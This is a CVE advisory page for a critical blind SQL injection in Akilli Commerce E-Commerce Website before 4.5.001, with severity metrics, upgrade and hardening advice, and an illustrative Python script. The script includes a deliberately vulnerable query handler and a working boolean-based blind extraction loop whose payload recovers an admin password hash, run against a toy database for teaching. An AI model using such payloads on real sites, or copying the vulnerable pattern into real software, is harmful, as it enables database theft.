Description
Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website allows Blind SQL Injection.

This issue affects E-Commerce Website: before 4.5.001.
Published: 2026-05-14
Score: 9.8 Critical
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

An improper neutralization of special elements used in an SQL command (CWE-89) in Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website allows blind SQL injection. In a blind injection the application does not echo query results or database error messages back to the attacker; instead the attacker infers the contents of the database one bit at a time from an observable side channel, either a change in page content (boolean-based) or a delay introduced through a sleep-style function (time-based). Even without direct output this can disclose sensitive data such as customer records, order details, or stored credentials, and, given the high integrity and availability impact recorded in the CVSS vector, may also allow data to be modified or destroyed.

Affected Systems

Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website releases before 4.5.001 are affected. Deployments running those releases are exposed through whatever user-supplied input the web interface passes into SQL queries; the advisory does not name the specific parameter.

Risk and Exploitability

The CVSS 3.1 score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) indicates critical severity: the flaw is reachable over the network without authentication or user interaction, and a successful injection compromises the confidentiality, integrity and availability of the backing database. The EPSS estimate is currently below 1% and the vulnerability is not listed in the CISA KEV catalog; the SSVC assessment records Exploitation as "none" but Automatable as "yes", so low observed exploitation should not be mistaken for low exposure. Blind SQL injection is slower to exploit than error-based injection but is fully scriptable with tools that infer data one character at a time. The advisory does not identify the injection point; any web form or URL parameter whose value reaches a database query is a candidate (product search or login fields are the usual suspects), and the "before 4.5.001" affected range indicates the issue is addressed in 4.5.001.

Generated by OpenCVE AI on May 14, 2026 at 11:22 UTC.

Remediation

No vendor advisory or workaround is linked on this page. The affected range ("before 4.5.001") indicates that 4.5.001 contains the fix.

OpenCVE Recommended Actions

  • Upgrade Akilli Commerce E‑Commerce Website to version 4.5.001 or later to eliminate the vulnerable code path.
  • Use parameterized queries (prepared statements) for every database interaction so that user input is bound as data and never parsed as SQL; treat input validation and escaping as defence in depth rather than as the fix, in line with the CWE‑89 guidance.
  • Run the web application against a database account with the minimum privileges it needs (read-only where possible, no access to unrelated tables, no file or administrative functions), limiting what an injection can reach even if one succeeds.

Generated by OpenCVE AI on May 14, 2026 at 11:22 UTC.
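As an added illustration, not code from this page or from the vendor, the following Python script models the two halves of the analysis above: a search handler that splices user input into its SQL text (CWE-89), a boolean-based blind extraction loop whose only signal is whether the results page is empty or not, and the parameterized version of the same handler, against which the identical payloads return nothing. The SQLite backend, the `products` and `admins` tables, the product names and the `admin` secret are all constructed for the example and are assumptions, not the vendor's schema or code.

```python
import sqlite3
import string

ALPHABET = string.ascii_lowercase + string.digits


def build_db() -> sqlite3.Connection:
    """Constructed sample data (assumption, not the vendor's schema): a products
    table that the search page reads, and an admins table holding a secret."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT NOT NULL);
        INSERT INTO products (name) VALUES ('Blue Mug'), ('Red Kettle'), ('Green Bowl');
        CREATE TABLE admins (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO admins (username, password_hash) VALUES ('admin', 'a1b2c3');
        """
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list[str]:
    """Hypothetical CWE-89 handler: the search term is spliced into the SQL text,
    so a quote in the input closes the string literal and the rest is parsed as SQL."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn: sqlite3.Connection, term: str) -> list[str]:
    """Hardened handler: the term is bound as a parameter, so it is only ever
    compared as a LIKE pattern and cannot change the structure of the query."""
    sql = "SELECT name FROM products WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]


def page_shows_results(search, conn: sqlite3.Connection, term: str) -> bool:
    """The only thing a blind attacker observes: the results page is empty or not."""
    return len(search(conn, term)) > 0


def extract_secret(search, conn: sqlite3.Connection, max_len: int = 32) -> str:
    """Boolean-based blind extraction. 'Mug' matches one product on its own; the
    injected AND condition lets that row appear only when the guessed character
    is correct. The trailing '--' comments out the %' the original query appends."""
    secret = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in ALPHABET:
            payload = (
                "Mug' AND substr((SELECT password_hash FROM admins "
                f"WHERE username='admin'),{pos},1)='{ch}'--"
            )
            if page_shows_results(search, conn, payload):
                found = ch
                break
        if found is None:  # no character matched at this position: end of secret
            break
        secret += found
    return secret


if __name__ == "__main__":
    db = build_db()
    print("vulnerable handler leaks:   ", repr(extract_secret(search_vulnerable, db)))
    print("parameterized handler leaks:", repr(extract_secret(search_parameterized, db)))
```

Against the vulnerable handler the loop recovers the full `admins` secret with one request per guessed character; against the parameterized handler every payload is just a LIKE pattern that matches no product, so the loop stops immediately with an empty string. A time-based variant replaces the `AND substr(...)` condition with a conditional delay (for example `SLEEP()` on MySQL or `pg_sleep()` on PostgreSQL; SQLite has no equivalent) and measures response time instead of page content, which is why the analysis above lists both side channels.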

Tracking


Advisories

No advisories yet.

History

Thu, 14 May 2026 20:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Thu, 14 May 2026 11:45:00 +0000

Type Values Removed Values Added
First Time appeared Akilli Commerce Software Technologies Ltd. Co.
Akilli Commerce Software Technologies Ltd. Co. e-commerce Website
Vendors & Products Akilli Commerce Software Technologies Ltd. Co.
Akilli Commerce Software Technologies Ltd. Co. e-commerce Website

Thu, 14 May 2026 10:00:00 +0000

Type Values Removed Values Added
Description Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Akilli Commerce Software Technologies Ltd. Co. E-Commerce Website allows Blind SQL Injection. This issue affects E-Commerce Website: before 4.5.001.
Title SQLi in Akıllı Ticaret's E-Commerce Pack
Weaknesses CWE-89
References
Metrics cvssV3_1

{'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}


MITRE

Status: PUBLISHED

Assigner: TR-CERT

Published:

Updated: 2026-05-14T19:10:36.914Z

Reserved: 2025-09-26T08:07:34.606Z

Link: CVE-2025-11024

Vulnrichment

Updated: 2026-05-14T19:10:28.127Z

NVD

Status : Deferred

Published: 2026-05-14T10:16:17.760

Modified: 2026-05-14T16:20:13.477

Link: CVE-2025-11024

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-14T11:30:16Z

Weaknesses